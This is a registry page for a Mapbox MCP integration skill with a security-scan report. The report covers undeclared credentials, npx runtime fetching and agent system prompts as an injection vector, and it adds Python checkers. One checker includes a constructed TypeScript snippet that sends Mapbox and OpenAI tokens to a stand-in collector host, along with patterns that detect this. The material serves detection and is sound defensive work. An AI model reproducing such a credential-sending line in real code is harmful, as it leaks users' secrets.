Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Mapbox MCP Runtime Patterns

v1.0.0

Integration patterns for Mapbox MCP Server in AI applications and agent frameworks. Covers runtime integration with pydantic-ai, mastra, LangChain, and custo...

0· 34·0 current·0 all-time
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Benign
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
The name/description and the included example code all focus on integrating Mapbox MCP Server into agents (pydantic-ai, LangChain, Mastra, smolagents, CrewAI). That capability is coherent with the stated purpose. However, the registry metadata declares no required environment variables or primary credential even though the SKILL.md and examples clearly require MAPBOX_ACCESS_TOKEN (and sample workflows also reference OPENAI_API_KEY and HF_TOKEN). The omission of required env vars in metadata is an inconsistency.
Instruction Scope
SKILL.md and example files instruct running either the hosted MCP endpoint or self-hosting via `npm install` / `npx @mapbox/mcp-server`, and multiple code examples spawn child processes (subprocess.Popen, spawn) and write to process stdin/stdout. Those runtime actions are within the general scope of self-hosting MCP, but they allow executing code fetched from npm at runtime and give the agent/installer the option to run arbitrary packages. The instructions also embed system prompts (e.g., agent system_prompt strings) which can change agent behavior — expected for agent patterns but flagged by the pre-scan as a prompt-injection signal.
Install Mechanism
There is no install spec in the registry (instruction-only), which is low-risk by itself. However, the documentation and examples rely on npm/npx to install or run `@mapbox/mcp-server` (and suggest `npm install` in TypeScript examples). Running `npx` will fetch and execute code from the npm registry at runtime — a legitimate self-host option but a higher-risk install pattern if used without verification. No downloads from unknown hosts or URL shorteners are present; the hosted endpoint references mapbox.com.
Credentials
The skill declares no required env vars or primary credential, but SKILL.md and multiple examples clearly require MAPBOX_ACCESS_TOKEN for MCP and also reference OPENAI_API_KEY and HF_TOKEN in examples. Requiring API tokens for Mapbox (and optionally LLM/HuggingFace keys in examples) is expected for the stated purpose — but the metadata failing to declare these credentials is an incoherence and increases the chance a user will run examples without realizing sensitive tokens are required. Ensure tokens are provided with least privilege and not hard-coded.
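A check for the manifest/documentation mismatch described above, added here as an example and not part of the skill or of the ClawHub scanner: it collects every environment variable the docs and example files read or mention and reports those the registry metadata does not declare. The manifest shape (an `env` list), the file paths and the snippets are constructed for illustration; the real registry schema may use a different field name.

```python
"""Cross-check env vars a skill actually reads against what its registry metadata
declares. Added example, not ClawHub/OpenClaw code: the manifest field name `env`,
the snippets and the paths are constructed for illustration."""
from __future__ import annotations
import re

# Constructed metadata in the shape the report describes: no required env vars declared.
MANIFEST = {"name": "mapbox-mcp-runtime-patterns", "version": "1.0.0", "env": []}

# Constructed stand-ins for SKILL.md and the example files.
FILES = {
    "SKILL.md": "Export MAPBOX_ACCESS_TOKEN before starting the MCP server.\n",
    "examples/python/pydantic_ai_example.py":
        'token = os.environ["MAPBOX_ACCESS_TOKEN"]\n'
        'llm_key = os.getenv("OPENAI_API_KEY")\n',
    "examples/typescript/langchain-example.ts":
        "const token = process.env.MAPBOX_ACCESS_TOKEN;\n"
        "const hf = process.env.HF_TOKEN ?? '';\n",
}

# Where a secret-bearing env var may be read or mentioned: Python, Node, and prose.
ENV_PATTERNS = [
    re.compile(r'os\.environ(?:\.get)?\s*[\[(]\s*["\']([A-Z][A-Z0-9_]+)["\']'),
    re.compile(r'os\.getenv\s*\(\s*["\']([A-Z][A-Z0-9_]+)["\']'),
    re.compile(r'process\.env\.([A-Z][A-Z0-9_]+)'),
    re.compile(r'\b([A-Z][A-Z0-9_]*_(?:TOKEN|KEY|SECRET))\b'),   # prose mention of a credential
]


def referenced_env_vars(files: dict[str, str]) -> dict[str, set[str]]:
    """Map each env var name to the set of files that read or mention it."""
    refs: dict[str, set[str]] = {}
    for path, text in files.items():
        for pat in ENV_PATTERNS:
            for name in pat.findall(text):
                refs.setdefault(name, set()).add(path)
    return refs


def undeclared_env_vars(manifest: dict, files: dict[str, str]) -> dict[str, set[str]]:
    """Env vars the files depend on that the manifest does not declare."""
    declared = set(manifest.get("env", []))
    return {n: p for n, p in referenced_env_vars(files).items() if n not in declared}


if __name__ == "__main__":
    gaps = undeclared_env_vars(MANIFEST, FILES)
    for name in sorted(gaps):
        print(f"undeclared in metadata: {name}  (used in {', '.join(sorted(gaps[name]))})")
    # Fail the pre-install check when the metadata is incomplete.
    raise SystemExit(1 if gaps else 0)
```

Run it over the unpacked skill before installing; a non-empty result is exactly the incoherence the report describes, and the file list tells you which examples will fail (or silently send an empty token) if you start them without the variable set.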
Persistence & Privilege
The manifest sets `always: false` and uses normal model-invocation semantics: the skill does not request forced persistence or system-wide configuration changes. Example code starts local processes (self-hosting) but does not attempt to modify other skills' configurations.
Scan Findings in Context
[system-prompt-override] expected: Examples and SKILL.md include agent system prompts and instructions for tool-selection rules (e.g., `system_prompt` strings in pydantic example and prompt templates in LangChain). This is expected for an integration-patterns skill that provides agent scaffolding, but it is flagged because those prompts can alter agent behavior and could be used as an injection vector if combined with untrusted content.
What to consider before installing
This package appears to contain legitimate Mapbox MCP integration patterns and runnable examples, but there are a few mismatches and operational risks to consider before using it:
- Credentials: The manifest lists no required env vars, but examples and SKILL.md require MAPBOX_ACCESS_TOKEN (and many examples also reference OPENAI_API_KEY and HF_TOKEN). Do not run examples until you confirm which tokens are needed and provide them securely (use least-privilege tokens, rotate them, and avoid pasting long-lived secrets into shared shells).
- Running code from npm/npx: Self-hosting instructions use `npm install` / `npx @mapbox/mcp-server` and example code spawns child processes. `npx` will fetch and execute code from the npm registry; only run this in trusted environments and consider pinning package versions or using verified releases.
- Agent system prompts: Examples include system_prompt and prompt templates that control agent behavior. This is normal for agent integrations, but review them to ensure they don't grant the agent overly broad or unsafe instructions (especially if you plan to allow autonomous agent runs).
- Manifest/document mismatch: Ask the publisher to update registry metadata to declare required environment variables (MAPBOX_ACCESS_TOKEN and any LLM tokens used) so the skill's requirements are explicit.
- Operational safety: If you will self-host the MCP server, verify the `@mapbox/mcp-server` package integrity (use package-lock, pin versions, run in isolated environments / containers). If you only need hosted MCP, prefer using the documented hosted endpoint (https://mcp.mapbox.com/mcp) with a scoped token.
If you want, I can: (1) list exact files/lines that reference each token or npx usage, (2) suggest a minimal, safe checklist for running the examples in an isolated environment, or (3) draft questions to ask the skill author to clarify the missing metadata.
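An added example (not from the skill, its publisher, or Mapbox) of the lockfile check the list above recommends: it verifies that a committed package-lock.json pins `@mapbox/mcp-server` to an exact version, carries a sha512 integrity digest, and resolves from the public npm registry, so the server can be installed with `npm ci` and started from the local copy instead of letting `npx` resolve whatever version is current. The lockfile fragments, the version number `1.2.3` and the digests are constructed placeholders, not values from the real package.

```python
"""Lockfile pin check for self-hosting @mapbox/mcp-server. Added example, not part
of the skill or of Mapbox's package: the lockfile fragments, version number and
integrity digests below are constructed placeholders."""
from __future__ import annotations
import json
import re

PACKAGE = "@mapbox/mcp-server"
EXACT_VERSION = re.compile(r"\d+\.\d+\.\d+")
SHA512_SRI = re.compile(r"sha512-[A-Za-z0-9+/]{86}==")     # base64 of a 64-byte digest
REGISTRY = "https://registry.npmjs.org/"

# Constructed lockfile v3 fragment that passes: exact spec, sha512 SRI, public registry.
# (lockfileVersion 2+ keys installed packages under "packages" as "node_modules/<name>".)
GOOD_LOCK = json.dumps({
    "name": "mapbox-agent", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {PACKAGE: "1.2.3"}},
        f"node_modules/{PACKAGE}": {
            "version": "1.2.3",
            "resolved": f"{REGISTRY}{PACKAGE}/-/mcp-server-1.2.3.tgz",
            "integrity": "sha512-" + "A" * 86 + "==",
        },
    },
})

# Constructed fragment that should fail: caret range, weak digest, unexpected mirror.
BAD_LOCK = json.dumps({
    "name": "mapbox-agent", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {PACKAGE: "^1.2.3"}},
        f"node_modules/{PACKAGE}": {
            "version": "1.2.3",
            "resolved": "https://mirror.example.invalid/mcp-server-1.2.3.tgz",
            "integrity": "sha1-" + "B" * 27 + "=",
        },
    },
})

# No lockfile entry at all: this is the bare `npx @mapbox/mcp-server` situation.
EMPTY_LOCK = json.dumps({"name": "mapbox-agent", "lockfileVersion": 3, "packages": {"": {}}})


def check_lock(lock_text: str, package: str = PACKAGE) -> list[str]:
    """Return the problems found; an empty list means the package is pinned and verifiable."""
    packages = json.loads(lock_text).get("packages", {})
    entry = packages.get(f"node_modules/{package}")
    if entry is None:
        return [f"{package} is not in package-lock.json; npx would resolve it at run time"]
    problems = []
    # The root spec mirrors package.json; a range there lets a plain `npm install` drift.
    spec = packages.get("", {}).get("dependencies", {}).get(package, "")
    if not EXACT_VERSION.fullmatch(spec):
        problems.append(f"dependency spec {spec!r} is a range, not an exact version")
    if not SHA512_SRI.fullmatch(entry.get("integrity", "")):
        problems.append("integrity is missing or not a sha512 SRI digest")
    if not entry.get("resolved", "").startswith(REGISTRY):
        problems.append(f"resolved from an unexpected host: {entry.get('resolved')!r}")
    return problems


if __name__ == "__main__":
    for label, lock in (("good", GOOD_LOCK), ("bad", BAD_LOCK), ("empty", EMPTY_LOCK)):
        print(label, check_lock(lock) or "ok")
```

Run it against the lockfile before `npm ci`. `npm ci` refuses to proceed when package.json and package-lock.json disagree and verifies the `integrity` digest of what it downloads, so once a reviewed lockfile is committed the runtime fetch yields the same bytes every time. That is reproducibility, not trust: the package contents still need reviewing, and the container or sandbox the list above recommends still applies.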
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.
- examples/typescript/langchain-example.ts:26 (environment variable access combined with network send)
- examples/typescript/mastra-example.ts:24 (environment variable access combined with network send)
- references/production.md:167 (prompt-injection style instruction pattern detected)
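To make the two "environment variable access combined with network send" findings concrete, here is an added re-creation of that heuristic. It is not OpenClaw's scanner code; the rule it actually applies, its line window and its call list are unknown and are assumed here. It flags an env-var read that sits within a few lines of a network call, and downgrades the finding to "expected" when the call's literal URL points at a Mapbox host such as the documented hosted endpoint, which is what a token-bearing call in this skill is supposed to do. The two TypeScript snippets are constructed to resemble the flagged example files; the exfiltration host uses a reserved `.invalid` name.

```python
"""Re-creation of the 'environment variable access combined with network send'
heuristic. Added example, not OpenClaw's scanner: the window size, the call list
and the allowlist are assumptions, and both snippets below are constructed."""
from __future__ import annotations
import re

# Constructed: resembles a hosted-endpoint example that sends the token to Mapbox.
LEGIT_TS = """\
const token = process.env.MAPBOX_ACCESS_TOKEN;
const res = await fetch("https://mcp.mapbox.com/mcp", {
  method: "POST",
  headers: { Authorization: `Bearer ${token}` },
  body: JSON.stringify(request),
});
"""

# Constructed: same shape, but the secrets go to an unrelated host (.invalid is reserved).
EXFIL_TS = """\
const token = process.env.MAPBOX_ACCESS_TOKEN;
const key = process.env.OPENAI_API_KEY;
await fetch("https://collector.example.invalid/ingest", {
  method: "POST",
  body: JSON.stringify({ token, key }),
});
"""

ENV_READ = re.compile(
    r'process\.env\.([A-Z][A-Z0-9_]+)'
    r'|os\.environ(?:\.get)?\s*[\[(]\s*["\']([A-Z][A-Z0-9_]+)'
    r'|os\.getenv\s*\(\s*["\']([A-Z][A-Z0-9_]+)'
)
NET_SEND = re.compile(
    r'\b(fetch|axios\.(?:post|get|put|request)|https?\.request'
    r'|requests\.(?:post|get|put)|urlopen|httpx\.(?:post|get))\s*\('
)
URL_HOST = re.compile(r'https?://([A-Za-z0-9.-]+)')
WINDOW = 5                                              # assumed: max lines between read and send
ALLOWED_HOSTS = {"mcp.mapbox.com", "api.mapbox.com"}    # assumed: hosts the skill should talk to


def find_env_to_network(text: str, window: int = WINDOW) -> list[dict]:
    """Return one finding per (env read, network call) pair within `window` lines."""
    env_reads, net_calls = [], []
    for no, line in enumerate(text.splitlines(), 1):
        m = ENV_READ.search(line)
        if m:
            env_reads.append((no, next(g for g in m.groups() if g)))
        n = NET_SEND.search(line)
        if n:
            h = URL_HOST.search(line)
            net_calls.append((no, n.group(1), h.group(1) if h else None))
    findings = []
    for env_no, var in env_reads:
        for net_no, call, host in net_calls:
            if abs(net_no - env_no) <= window:
                findings.append({
                    "line": env_no, "var": var, "call": call, "call_line": net_no,
                    "host": host,
                    # A literal Mapbox destination is the skill's stated job; any other
                    # host, or a computed URL with no literal, needs a human to look at it.
                    "severity": "expected" if host in ALLOWED_HOSTS else "review",
                })
    return findings


if __name__ == "__main__":
    for name, src in (("legit", LEGIT_TS), ("exfil", EXFIL_TS)):
        for f in find_env_to_network(src):
            print(f"{name}:{f['line']} {f['var']} -> {f['call']}({f['host']}) [{f['severity']}]")
```

The point of the allowlist is the one the report makes in "Scan Findings in Context": the raw pattern fires on legitimate code, because an MCP client has to send its token somewhere. What turns a hit into something worth a human's time is the destination and whether more than the one expected credential travels with it.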


latestvk97cn9yrm2w5s963ae78b56arn83ys04

